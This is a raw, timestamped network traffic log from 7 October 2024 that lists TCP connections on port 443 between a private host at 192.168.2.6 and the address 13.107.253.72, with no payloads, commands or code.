Oct 7, 2024 18:47:41.087187052 CEST	49768	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:41.087193966 CEST	443	49768	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:41.089487076 CEST	49774	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:41.089533091 CEST	443	49774	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:41.089652061 CEST	49774	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:41.089790106 CEST	49774	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:41.089803934 CEST	443	49774	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:41.102561951 CEST	443	49770	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:41.102725029 CEST	443	49770	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:41.102777958 CEST	49770	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:41.102809906 CEST	49770	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:41.102809906 CEST	49770	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:41.102826118 CEST	443	49770	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:41.102833986 CEST	443	49770	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:41.104738951 CEST	49775	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:41.104834080 CEST	443	49775	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:41.104899883 CEST	49775	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:41.105009079 CEST	49775	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:41.105029106 CEST	443	49775	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:41.558259964 CEST	443	49772	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:41.558342934 CEST	49772	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:41.559423923 CEST	49772	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:41.559453011 CEST	443	49772	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:41.559839010 CEST	443	49772	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:41.560477972 CEST	49772	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:41.580703974 CEST	443	49771	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:41.580789089 CEST	49771	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:41.581842899 CEST	49771	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:41.581860065 CEST	443	49771	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:41.582629919 CEST	443	49771	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:41.583425045 CEST	49771	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:41.607413054 CEST	443	49772	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:41.627418995 CEST	443	49771	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:41.683276892 CEST	443	49773	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:41.683818102 CEST	49773	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:41.683847904 CEST	443	49773	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:41.684299946 CEST	49773	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:41.684310913 CEST	443	49773	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:41.755395889 CEST	443	49772	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:41.755466938 CEST	443	49772	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:41.755703926 CEST	49772	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:41.755703926 CEST	49772	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:41.755794048 CEST	49772	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:41.755836964 CEST	443	49772	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:41.758270979 CEST	49776	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:41.758378983 CEST	443	49776	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:41.758491039 CEST	49776	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:41.758622885 CEST	49776	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:41.758656979 CEST	443	49776	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:41.790308952 CEST	443	49775	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:41.791924000 CEST	49775	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:41.791985989 CEST	443	49775	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:41.792412996 CEST	49775	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:41.792426109 CEST	443	49775	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:41.820813894 CEST	443	49771	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:41.820997953 CEST	443	49771	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:41.821058035 CEST	49771	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:41.821108103 CEST	49771	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:41.821135044 CEST	443	49771	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:41.821155071 CEST	49771	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:41.821162939 CEST	443	49771	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:41.823659897 CEST	49777	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:41.823697090 CEST	443	49777	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:41.823928118 CEST	49777	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:41.824701071 CEST	49777	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:41.824711084 CEST	443	49777	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:41.850393057 CEST	443	49774	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:41.850760937 CEST	49774	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:41.850783110 CEST	443	49774	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:41.851155043 CEST	49774	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:41.851159096 CEST	443	49774	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:41.859215975 CEST	443	49773	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:41.859421968 CEST	443	49773	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:41.859478951 CEST	49773	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:41.859510899 CEST	49773	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:41.859525919 CEST	443	49773	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:41.859539032 CEST	49773	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:41.859544039 CEST	443	49773	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:41.861594915 CEST	49778	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:41.861622095 CEST	443	49778	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:41.861691952 CEST	49778	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:41.863435030 CEST	49778	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:41.863447905 CEST	443	49778	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:41.901106119 CEST	443	49775	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:41.901278019 CEST	443	49775	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:41.901336908 CEST	49775	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:41.901390076 CEST	49775	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:41.901391029 CEST	49775	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:41.901418924 CEST	443	49775	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:41.901442051 CEST	443	49775	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:41.903614998 CEST	49779	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:41.903713942 CEST	443	49779	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:41.904731989 CEST	49779	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:41.904860020 CEST	49779	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:41.904887915 CEST	443	49779	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:41.960885048 CEST	443	49774	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:41.961057901 CEST	443	49774	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:41.961352110 CEST	49774	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:41.961380959 CEST	49774	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:41.961396933 CEST	443	49774	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:41.961402893 CEST	49774	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:41.961407900 CEST	443	49774	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:41.963748932 CEST	49780	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:41.963845968 CEST	443	49780	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:41.963923931 CEST	49780	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:41.964041948 CEST	49780	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:41.964065075 CEST	443	49780	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:42.400859118 CEST	443	49776	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:42.401856899 CEST	49776	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:42.401935101 CEST	443	49776	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:42.402226925 CEST	49776	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:42.402242899 CEST	443	49776	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:42.496762037 CEST	443	49777	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:42.497354031 CEST	49777	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:42.497379065 CEST	443	49777	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:42.497740984 CEST	49777	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:42.497756958 CEST	443	49777	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:42.612884045 CEST	443	49776	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:42.612957954 CEST	443	49776	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:42.613145113 CEST	49776	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:42.613431931 CEST	49776	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:42.613431931 CEST	49776	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:42.613485098 CEST	443	49776	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:42.613514900 CEST	443	49776	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:42.618407011 CEST	49781	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:42.618453026 CEST	443	49781	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:42.618530989 CEST	49781	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:42.618750095 CEST	49781	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:42.618767023 CEST	443	49781	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:42.661345005 CEST	443	49778	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:42.661813021 CEST	49778	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:42.661833048 CEST	443	49778	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:42.662266970 CEST	49778	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:42.662281036 CEST	443	49778	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:42.664280891 CEST	443	49779	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:42.664576054 CEST	49779	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:42.664644003 CEST	443	49779	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:42.664876938 CEST	49779	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:42.664892912 CEST	443	49779	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:42.694802046 CEST	443	49777	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:42.694869041 CEST	443	49777	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:42.694950104 CEST	49777	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:42.695318937 CEST	49777	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:42.695318937 CEST	49777	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:42.695342064 CEST	443	49777	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:42.695353031 CEST	443	49777	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:42.698240995 CEST	49782	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:42.698293924 CEST	443	49782	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:42.698596954 CEST	49782	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:42.698596954 CEST	49782	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:42.698637962 CEST	443	49782	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:42.751530886 CEST	443	49780	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:42.751974106 CEST	49780	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:42.752043009 CEST	443	49780	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:42.752485991 CEST	49780	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:42.752501965 CEST	443	49780	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:42.771872044 CEST	443	49778	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:42.772025108 CEST	443	49778	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:42.772069931 CEST	49778	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:42.772382021 CEST	49778	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:42.772401094 CEST	443	49778	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:42.772411108 CEST	49778	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:42.772417068 CEST	443	49778	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:42.773128033 CEST	443	49779	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:42.773689985 CEST	443	49779	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:42.773807049 CEST	49779	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:42.773895025 CEST	49779	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:42.773895979 CEST	49779	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:42.773942947 CEST	443	49779	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:42.773974895 CEST	443	49779	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:42.776633024 CEST	49783	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:42.776700974 CEST	443	49783	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:42.776766062 CEST	49783	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:42.792639017 CEST	49783	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:42.792670012 CEST	443	49783	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:42.793643951 CEST	49784	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:42.793704033 CEST	443	49784	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:42.793889999 CEST	49784	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:42.793992996 CEST	49784	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:42.793999910 CEST	443	49784	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:42.857877970 CEST	443	49780	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:42.858053923 CEST	443	49780	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:42.858114004 CEST	49780	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:42.858202934 CEST	49780	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:42.858234882 CEST	443	49780	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:42.858262062 CEST	49780	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:42.858274937 CEST	443	49780	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:42.877763987 CEST	49785	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:42.877866983 CEST	443	49785	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:42.878063917 CEST	49785	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:42.878415108 CEST	49785	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:42.878451109 CEST	443	49785	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:43.270772934 CEST	443	49781	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:43.277348995 CEST	49781	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:43.277394056 CEST	443	49781	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:43.284603119 CEST	49781	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:43.284621954 CEST	443	49781	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:43.337537050 CEST	443	49782	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:43.338124990 CEST	49782	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:43.338140965 CEST	443	49782	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:43.338586092 CEST	49782	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:43.338592052 CEST	443	49782	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:43.392580032 CEST	443	49781	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:43.392637014 CEST	443	49781	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:43.395276070 CEST	49781	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:43.395457983 CEST	49781	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:43.395482063 CEST	443	49781	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:43.395493984 CEST	49781	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:43.395500898 CEST	443	49781	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:43.410749912 CEST	49786	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:43.410856009 CEST	443	49786	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:43.410929918 CEST	49786	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:43.411154985 CEST	49786	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:43.411191940 CEST	443	49786	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:43.441450119 CEST	443	49783	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:43.441870928 CEST	49783	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:43.441934109 CEST	443	49783	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:43.442307949 CEST	49783	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:43.442322969 CEST	443	49783	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:43.443113089 CEST	443	49782	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:43.443170071 CEST	443	49782	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:43.443360090 CEST	49782	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:43.443521023 CEST	49782	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:43.443542957 CEST	443	49782	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:43.443559885 CEST	49782	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:43.443568945 CEST	443	49782	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:43.446496964 CEST	49787	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:43.446540117 CEST	443	49787	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:43.446599960 CEST	49787	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:43.446835041 CEST	49787	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:43.446851015 CEST	443	49787	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:43.459458113 CEST	443	49784	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:43.459849119 CEST	49784	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:43.459871054 CEST	443	49784	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:43.460274935 CEST	49784	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:43.460280895 CEST	443	49784	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:43.509242058 CEST	443	49785	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:43.509722948 CEST	49785	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:43.509789944 CEST	443	49785	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:43.510128021 CEST	49785	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:43.510143042 CEST	443	49785	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:43.573653936 CEST	443	49783	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:43.573829889 CEST	443	49783	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:43.573904991 CEST	49783	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:43.574022055 CEST	49783	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:43.574073076 CEST	443	49783	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:43.574105024 CEST	49783	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:43.574122906 CEST	443	49783	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:43.576695919 CEST	49788	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:43.576745033 CEST	443	49788	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:43.576803923 CEST	49788	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:43.576966047 CEST	49788	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:43.576987982 CEST	443	49788	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:43.588411093 CEST	443	49784	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:43.588479042 CEST	443	49784	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:43.588538885 CEST	49784	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:43.588676929 CEST	49784	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:43.588692904 CEST	443	49784	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:43.588702917 CEST	49784	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:43.588707924 CEST	443	49784	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:43.590801001 CEST	49789	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:43.590854883 CEST	443	49789	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:43.590986967 CEST	49789	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:43.591149092 CEST	49789	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:43.591167927 CEST	443	49789	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:43.614886045 CEST	443	49785	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:43.615047932 CEST	443	49785	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:43.615134001 CEST	49785	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:43.615365982 CEST	49785	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:43.615437031 CEST	443	49785	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:43.615484953 CEST	49785	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:43.615500927 CEST	443	49785	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:43.618236065 CEST	49790	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:43.618289948 CEST	443	49790	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:43.618351936 CEST	49790	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:43.618531942 CEST	49790	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:43.618546963 CEST	443	49790	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:44.112504959 CEST	443	49787	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:44.113220930 CEST	49787	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:44.113253117 CEST	443	49787	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:44.113656044 CEST	49787	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:44.113668919 CEST	443	49787	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:44.136508942 CEST	443	49786	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:44.136888981 CEST	49786	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:44.136949062 CEST	443	49786	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:44.137362957 CEST	49786	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:44.137377977 CEST	443	49786	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:44.216279984 CEST	443	49787	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:44.216340065 CEST	443	49787	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:44.216514111 CEST	49787	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:44.216722012 CEST	49787	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:44.216737032 CEST	443	49787	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:44.216747046 CEST	49787	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:44.216753960 CEST	443	49787	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:44.220035076 CEST	49791	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:44.220065117 CEST	443	49791	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:44.220165968 CEST	49791	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:44.220385075 CEST	49791	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:44.220397949 CEST	443	49791	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:44.221890926 CEST	443	49789	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:44.222322941 CEST	49789	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:44.222348928 CEST	443	49789	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:44.222738028 CEST	49789	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:44.222745895 CEST	443	49789	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:44.225590944 CEST	443	49788	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:44.226299047 CEST	49788	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:44.226299047 CEST	49788	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:44.226316929 CEST	443	49788	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:44.226324081 CEST	443	49788	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:44.283174038 CEST	443	49790	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:44.284013987 CEST	49790	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:44.284054041 CEST	443	49790	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:44.284362078 CEST	49790	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:44.284370899 CEST	443	49790	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:44.330836058 CEST	443	49789	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:44.331008911 CEST	443	49789	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:44.331847906 CEST	443	49788	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:44.331880093 CEST	49789	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:44.331880093 CEST	49789	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:44.331998110 CEST	443	49788	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:44.332030058 CEST	49789	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:44.332060099 CEST	443	49789	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:44.332087994 CEST	49788	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:44.332158089 CEST	49788	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:44.332158089 CEST	49788	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:44.332175016 CEST	443	49788	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:44.332182884 CEST	443	49788	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:44.332519054 CEST	443	49786	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:44.332674026 CEST	443	49786	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:44.334510088 CEST	49792	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:44.334549904 CEST	443	49792	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:44.334587097 CEST	49786	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:44.334709883 CEST	49792	443	192.168.2.6	13.107.253.72
